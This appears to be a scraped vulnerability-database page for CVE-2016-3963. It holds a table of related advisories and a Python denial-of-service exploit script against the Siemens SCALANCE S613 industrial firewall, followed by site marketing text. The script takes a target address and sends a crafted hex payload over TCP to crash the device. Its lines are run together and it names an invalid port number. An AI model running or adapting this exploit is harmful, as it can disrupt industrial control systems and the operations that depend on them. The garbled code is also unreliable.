| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Siemens SCALANCE S613 Denial of Service | 8 May 201900:00 | – | nessus | |
| Siemens SCALANCE S613 Denial of Service (CVE-2016-3963) | 4 Dec 202400:00 | – | nessus | |
| Siemens SCALANCE S613 Denial of Service Vulnerability | 11 Apr 201600:00 | – | cnvd | |
| CVE-2016-3963 | 8 Apr 201615:00 | – | cve | |
| CVE-2016-3963 | 8 Apr 201615:00 | – | cvelist | |
| EUVD-2016-4972 | 7 Oct 202500:30 | – | euvd | |
| Siemens SCALANCE S613 - Remote Denial of Service | 23 May 201800:00 | – | exploitpack | |
| Siemens SCALANCE S613 Denial-of-Service Vulnerability | 14 Jan 201607:00 | – | ics | |
| CVE-2016-3963 | 8 Apr 201615:59 | – | nvd | |
| Siemens SCALANCE S613 Denial Of Service | 24 May 201800:00 | – | packetstorm |
# Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
# Tested on: Kali Linux
# CVE: CVE-2016-3963
#!/usr/bin/python
import socket import sys if len(sys.argv) < 2: print('Usage: ' +
sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
(sys.argv[1], 5000000))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation